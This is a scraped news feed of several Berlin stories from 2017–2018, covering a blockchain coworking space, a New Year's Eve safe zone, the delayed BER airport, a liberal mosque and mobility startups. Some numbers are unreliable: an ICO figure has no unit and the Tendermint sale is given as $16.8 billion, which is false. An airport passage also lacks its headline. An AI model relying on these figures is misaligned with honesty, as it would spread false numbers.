Berlin’s Full Node wants to be Europe’s largest blockchain coworking space https://briefnews.eu/berlins-full-node-wants-to-be-europes-largest-blockchain-coworking-space/ https://briefnews.eu/berlins-full-node-wants-to-be-europes-largest-blockchain-coworking-space/#respond Wed, 10 Jan 2018 12:05:02 +0000 http://briefnews.eu/berlins-full-node-wants-to-be-europes-largest-blockchain-coworking-space/

Beyond the massive speculative frenzy around cryptocurrencies, the underlying blockchain technology continues to attract an expanding range of entrepreneurs. This means various regions are now jockeying to become a hub for the growing ecosystem of blockchain startups.

Berlin is one of the cities that believes it’s worthy of the crown, and now it’s getting some help from a joint project launched by two of its more notable blockchain startups. The teams behind Berlin’s Tendermint and Gnosis have joined forces to create Full Node, a blockchain coworking space that will open in March in the city’s Kreuzberg neighborhood.

Gnosis and Tendermint have jointly rented 1000m² of space in the building, which will serve as their new headquarters as well as a co-working space for a combined 100 people. Full Node will offer meeting rooms, open space, and social areas for events and work.

Nadja Beneš, head of brand and content strategy for Gnosis, explained that the idea was initiated by their companies’ respective founders, who saw the number of blockchain entrepreneurs in Berlin growing at a rapid clip.

“The community was really dispersed,” Beneš said. “We had a desire to unite this growing blockchain community.”

Following a year in which Bitcoin soared to insane valuations and initial coin offerings threatened to rewrite the rules of startup funding, a much broader audience is tuning in to subjects like cryptocurrencies and blockchain. And with money flowing into this sector, the number of cities and countries wishing to get in on the action has soared. Malta, Singapore, and Slovenia have made plays to be seen as crypto hubs, while the city of Zug in Switzerland has been dubbed Crypto Valley and Estonia and Belarus have been jockying for position. And that doesn’t even count Europe’s traditional startup hubs, such as London and Paris.

Gnosis, founded by Martin Köppelmann and Stefan George, offers an Ethereum-based system for predicting the value of goods and markets. Originally part of ConsenSys, an Ethereum venture production studio, Gnosis was spun out in early 2017 and raised $ 12.5 in an ICO later that spring.

Meanwhile, Tendermint was originally a project developed by the Interchain Foundation, based in Zug. Tendermint has built a blockchain engine to verify any transactions made on the system are recorded on all machines in the same order. The foundation also raised $ 16.8 billion last year through a token sale to fund the creation of Cosmos, a new project being built by the Tendermint team using its engine to create a system that allows different blockchains to interoperate. The Cosmos project will be based at Full Node.

Cosmos’ head of strategy, Brian Fabian Crain, is host of Epicenter, one of the most popular blockchain podcasts, and is helping to oversee the Full Node project.

The founders of both companies knew each other and as their respective companies became squeezed for space, they set off looking for new digs. At the same time, they realized that the number of folks attending local Blockchain meetups was exploding. The city boasts a growing range of high-profile blockchain startups, including Iota, SatoshiPay, and Bitwala.

“Berlin was a place that attracted digital exiles and tech activists,” said Crain said in an emailed statement about the project. “People who care about anonymity and privacy protection have been moving here for a long time. And it’s a very creative city as well.”

The Full Node team sent out an informal email asking some attendees if they were looking for workspace, and they were overwhelmed by the response. The received almost 100 responses from people asking for space.

After several months of hunting, the companies found space in a three-story brick building owned by Berlin’s Samwer, brothers and cofounders of Rocket Internet.

While the location is starting as a headquarters and coworking space, the longer-term goal is to create interactions between members that facilitate joint projects, experimentation, research, and hopefully the development of new ideas and innovative ways to deploy blockchain technologies. The companies also have an option for a second floor in the building that would double Full Node’s square footage.

Despite the fierce competition to attract blockchain startups, Full Node’s founders are optimistic that the space will make Berlin’s crypto community stronger and even more attractive to entrepreneurs who are searching for the best places to launch a startup and find the talent they need.

“Berlin has the character of being experimental and alternative,” Beneš said. “And I think Full Node is something that perfectly fits the spirit of the city. Berlin is going to become the crypto capital of Europe. And this space will be at the heart of a vibrant blockchain ecosystem.”

‘End of equal rights’: Police union chief blasts Berlin’s New Year’s Eve safe zone for women https://briefnews.eu/end-of-equal-rights-police-union-chief-blasts-berlins-new-years-eve-safe-zone-for-women/ https://briefnews.eu/end-of-equal-rights-police-union-chief-blasts-berlins-new-years-eve-safe-zone-for-women/#respond Sat, 30 Dec 2017 18:21:19 +0000 http://briefnews.eu/end-of-equal-rights-police-union-chief-blasts-berlins-new-years-eve-safe-zone-for-women/

The head of Germany’s Police Union has slammed the creation of a special safe zone for women at a New Year’s Eve celebration at Berlin’s Brandenburg Gate, saying it implies that women celebrating outside the zone won’t be safe.

Rainer Wendt of the German Police Union (DPolG) told the Neuen Osnabrücker Zeitung, a German-language daily, that the planned ‘Women’s Safety Area’ sends a “devastating message” that women who venture outside the designated safe zone will be vulnerable to sexual assault. “It says that there are zones of security and zones of insecurity,” Wendt said, adding that the zone marks “the end of equal rights, freedom of movement and self-determination.”

The union chief added that the zone has a negative “political dimension” and would reignite fears of sexual attacks two years after hundreds of women reported being assaulted or robbed during New Year’s Eve celebrations in Cologne.

Organizers of the event – Germany’s largest New Year’s Eve party, according to the Berliner Zeitung – say that Berlin police proposed the zone after a similar system was introduced in Munich during the city’s annual Oktoberfest. The safe zone will be located in a tent set up by the German Red Cross, where a number of specially-trained staffers will be on hand.

Frank Hansel, a member of German parliament from the right-wing Alternative for Germany (AfD), told RT that the planned safe zone will likely be ineffective and ignores the root of the problem. “It’s doubtful that this will really prevent attacks,” said Hansel. “You would need to make up special zones for everybody, but this is not tangible. So, I think the policy should change. We should not continue to have this illegal mass migration. We have to count and see who the people are who came to our country; we have to register them.”

The Berlin branch of Germany’s police union said such a safe zone is definitely needed to help people. Condemning such measures has nothing to do with protecting people, the union said on Twitter in response to the criticism.

Women on the streets of Berlin also supported the controversial initiative. “That’s a good idea. Many people feel like they need help, but they don’t know who to ask for it. Having this service is kind of nice,” a woman told RT. “Being a woman, I feel frightened. This initiative is good, it’s needed – unfortunately,” another said.

Germany has experienced a surge in sexually-motivated attacks during public festivities lately. Two years ago during New Year’s Eve events, a wave of sexual assaults, as well as thefts and robberies targeting women, swept through several German cities, including Dusseldorf, Hamburg, Frankfurt, and Stuttgart.

Never-ending construction: Berlin’s unfinished airport still plagued by ‘fundamental faults’ https://briefnews.eu/never-ending-construction-berlins-unfinished-airport-still-plagued-by-fundamental-faults/ https://briefnews.eu/never-ending-construction-berlins-unfinished-airport-still-plagued-by-fundamental-faults/#respond Fri, 24 Nov 2017 20:55:34 +0000 http://briefnews.eu/never-ending-construction-berlins-unfinished-airport-still-plagued-by-fundamental-faults/ Berlin’s international airport in Brandenburg has turned into a sort of unending construction project due to numerous technical problems. Now, even the airport systems that were deemed ready-to-use were found to be malfunctioning.

More than 2,000 days since the initially scheduled opening, the end of construction of the infamous airport dubbed “the building site of horror” is still not in sight. A recent inspection has once again found “fundamental failures” in the operation of the airport safety systems that were considered fully functional.

Six out of every ten systems examined by the inspectors do not function properly, a report issued by German audit company TUV Rheinland Group says. “The tested systems and equipment partially do not meet the required standards,” the document issued early November and recently obtained by the German Tagesspiegel daily says.

It further states that “the operational safety and effectiveness of the faulty systems cannot be conclusively certified,” adding, that the operation level of the smoke extraction systems is still “unacceptable.” The report says further that inspectors identified “further faults and deficiencies” in the sprinkler systems, fire alarms and emergency lighting.

The commission discovered all these faults while examining the Mainpier Nord area of the airport’s main terminal, which was considered a rather well functioning section of the facility. According to Tagesspiegel, those responsible for the construction said they were confident that “not much” can happen there.

However, it turned out that after more than five years of refurbishing the terminal, its faulty systems still do not work. Notably, many deficiencies listed in the report are similar to the defects identified as early as in 2011/2012.

“The faults identified during the tests of the technical safety systems are in many cases systemic ones and can affect other yet untested systems or facilities of the passenger terminal,” the damning report says. The alarming findings of the inspection even prompted TUV Rheinland to promptly cancel its examination of a section of the Mainpier Sued main terminal, Tagesspiegel reports.

The sprinkler systems particularly seem to be a nemesis for the unfortunate construction debacle. Initial problems were identified in 2011, and the inspectors identified it as an issue again in 2016. In July 2017, the same problem persisted, prompting airport chief executive Engelbert Luetke Daldrup to announce plans to create a special 3D model of the airport to work out a detailed plan of the modification of some 78,000 fire extinguisher cartridges scattered across the building.

Later, airport management declared that 80 percent of the sprinkler systems were operational. However, it turned out that 49 out of 104 extinguishing areas of the sprinkler systems have problems with “impermissible pressure losses or excessively high flow rates.”

All the newly identified shortcomings mean the airport is unlikely to be opened in 2019.  Daldrup plans to announce the facility’s opening date on December 15.

The airport is now six years behind schedule and several times over its initial budget. The original budget of €2.5 billion ($ 2.98 billion) has since ballooned to €6.6 billion ($ 7.87 billion).

The airport has also become a laughing stock for many Germans, who say their tax euros were spent on a project bedevilled by technical hurdles and alterations. The one success airport management can ‘boast’ about, is that after 11 years of construction, 51 percent of the airport’s automated doors are fully functional.

In 2015, some politicians mockingly suggested that the airport building should be demolished and a new one built from scratch. Meanwhile, the humiliating history of delays have turned the airport into a sort of a tourist attraction, as Germans started offering two-hour tours to what is now dubbed as the “ghost airport.”

Co-founder of Berlin’s ‘liberal mosque’ under 24-hour protection after multiple death threats https://briefnews.eu/co-founder-of-berlins-liberal-mosque-under-24-hour-protection-after-multiple-death-threats/ https://briefnews.eu/co-founder-of-berlins-liberal-mosque-under-24-hour-protection-after-multiple-death-threats/#respond Tue, 04 Jul 2017 15:10:05 +0000 http://briefnews.eu/co-founder-of-berlins-liberal-mosque-under-24-hour-protection-after-multiple-death-threats/ A co-founder of Berlin’s first ‘liberal mosque’, which has allowed both men and women, including members of the LGBT community, to pray together since opening last month, has been placed under 24-hour protection after receiving hundreds of death threats.

Speaking to RT, Seyran Ates, a women’s rights activist and lawyer who is one of the unusual prayer site’s seven founders, said she is not surprised by the reaction, as she is the “heart” of a movement that is infringing on patriarchal values.

“I expected such a reaction. I expected that not everyone would like it. In general, of course, I knew that men wouldn’t give up the patriarchate so easily, because these are the patriarchal structures that we are attacking,” Ates told RT.

“At the moment I’ve only got threats, because I’m the theorist and, so to speak, the heart of the movement. But this is a movement and people should know that,” she went on, adding that, even if someone manages to silence her, the movement will continue on, as many people around the world already “have mobilized.”

Ates also announced that similar mosques will soon be opening in Freiburg, Cologne, and Switzerland. In Norway’s capital, Oslo, another ‘liberal mosque’ is to be opened within a year.

The mosque, which opened in Germany’s capital less than a month ago, has reversed several core Muslim rules. It allows men and women of all Muslim denominations to pray together, gives male and female worshippers equal rights, and is LGBT friendly. Moreover, it allows female imams, but prohibits women from entering the prayer site in niqabs or burkas.

Questioning the liberal mosque’s rules, Mohammed Shafiq, Chief Executive of the Ramadhan Foundation, told RT that, according to 1,400-year-old Islamic traditions, the person leading the prayer must be male.

“Women are absolutely essential part to be involved in the mosque, but the main prayers have to be led by a man, and any attempt to change that is distorting 1,400 year of Islamic history and we reject that,” Shafiq stated, adding that the core principles of Islam are still relevant and must not be changed.

The mosque has triggered a spat between Germany and Turkey, as the Turkish Presidency of Religious Affairs (Diyanet) has condemned it, calling its practices a provocation. Diyanet also accused the founders of following the ideas of Fethullah Gulen, whom Ankara has accused of masterminding the failed coup attempt in Turkey in July of 2016.
Berlin hit back, saying German citizens have the right to religious freedom and expression.

The co-founder of the Berlin mosque was surprised to hear about Turkey’s allegations and worried that they could scare Turkish people away.

“I didn’t expect – and it was naive of me – that Turkey would associate me with Fethullah Gulen terrorists, that they would suddenly call me a Gulen supporter. Partly because of this, Turkish people are afraid to come to us, but they know for sure that we’re not Gulen terrorists,” Ates said.

She said earlier that threats must not prevent people from fighting for their values, while calling on civil society to “fight together against this hatred” and make things change.

The modification of the currently malfunctioning sprinkler systems, problems with which were identified in December 2016, would be completed no sooner than by early 2018 on the most optimistic estimate, Engelbert Luetke Daldrup, the chief executive of the infamous Berlin-Brandenburg airport (BER), told the Berlin regional parliament on Wednesday.

Luetke Daldrup added that creation of a special 3D model of the airport is necessary to work out a detailed plan of the modification of some 78,000 fire extinguisher cartridges scattered across the airport building. He also said that the computer modeling phase is expected to be finished by late September.

The director also refused to say anything specific concerning the end of the airport construction. “I will make a statement on deadlines in the building construction schedule in due [course],” he said in response to questions concerning this issue.

However, Luetke Daldrup also had an opportunity to brag about a small victory in the airport’s 11-year long struggle with various misfortunes, as the automatic doors, problems with which were also identified in December 2016, are “no longer causing problems” for construction efforts.

Currently, 51 percent of the airport doors are fully functional and the problems with the rest will be “fully resolved by autumn,” the airport boss said, as reported by Germany’s Tagesspiegel daily. He also added that he is determined to bring the construction to a “successful end.”

The airport is a laughing stock for many Germans, who say their taxpayers’ euros was spent on a project plagued with technical hurdles and alterations. It was initially supposed to open in 2012, but later estimates placed the opening date in late 2017.

It was intended to provide Berlin with a new modern transport hub and to replace two smaller airports located in the Berlin suburb of Tegel and the neighboring town of Schoenefeld.

Now, it is five years behind schedule and several times over its initial budget. In 2015, some politicians mockingly suggested that the airport building should be demolished and a new one built from scratch.

BER may not be able to serve its intended purpose yet, but at least its humiliating history of delays made it a sort of tourist attraction. Two-hour tours to the facility branded a “ghost airport” by the German media let the curious visit the much-awaited facility.

Berlin’s approach to improving how people get around is less confrontational than Uber’s https://briefnews.eu/berlins-approach-to-improving-how-people-get-around-is-less-confrontational-than-ubers/ https://briefnews.eu/berlins-approach-to-improving-how-people-get-around-is-less-confrontational-than-ubers/#respond Sun, 11 Jun 2017 11:11:34 +0000 http://briefnews.eu/berlins-approach-to-improving-how-people-get-around-is-less-confrontational-than-ubers/ citymapper busRob Price/BI

App-based, ride-hailing services like Uber have become a popular transportation option in many major cities across Europe.

But they’ve also come under fire from the region’s traditional taxi service providers for skirting established industry regulations.

Uber-style disruption isn’t the only way to harness the power of digital to improve transportation, however.

Some recent efforts offer a less confrontational approach to digitally enhancing the way people get around.

In Germany, Berlin-based startup door2door announced a plan this week to create the country’s first on-demand mass transport solution for a rural area in the Bavarian Forest town of Freyung.

Scheduled to start in September, door2door’s service will supplement Freyung’s local public transport system by providing small shuttle buses that can be ordered on-demand using a smartphone app. To accommodate multiple passengers with multiple destinations in a system without a set pickup schedule or fixed routes, door2door’s technology calculates optimal itineraries, as well as the best use of the fleet to meet demand.

Door2door launched trials of a similar service called allygator shuttle in an area of Berlin last August. At the time, the company said it planned to expand the service to other cities in Germany, as well as to other countries.

In what could be construed as a dig at rule-bending upstarts like Uber, door2door also noted that all allygator drivers had passenger transport licenses in accordance with German regulations. And in announcing the initiative, company CEO Maxim Nohroudi noted that its approach “is based on cooperation with municipalities and urban transport providers to create fair and innovative solutions for urban public transport.”

Berlin isn’t the only European capital where public transport is being reassessed through a digital lens. In London last month, transport app Citymapper completed a three-day test of a pop-up bus route in conjunction with the city’s transit authority, Transport for London.

emarkeMarketerUnlike door2door’s efforts, the Citymapper Smartbus project ran on a fixed route using existing bus stops. The trial was part of a push to “rethink” how bus systems operate and to reassess routes to improve efficiency with help from demand and trip data of Citymapper users.

Transport apps like Citymapper and ride-hailing services like Uber have already transformed how tech-friendly smartphone users in Europe get around cities.

According to a February 2017 survey by Dalia Research, between 20% and 30% of the populations ages 14 to 65 in France, Germany and the UK had used a mobility app to request a ride, share a car, rent a bike or access another option along those lines in the 12 months prior to polling. Usage was even higher elsewhere in the region: 38% in Russia, 35% in Spain and Sweden, and 34% in Norway.

Expanding the mobility app sphere to include options like on-demand bus services—both in cities and in areas like Freyung with more limited transport options—could see usage of such services grow exponentially.
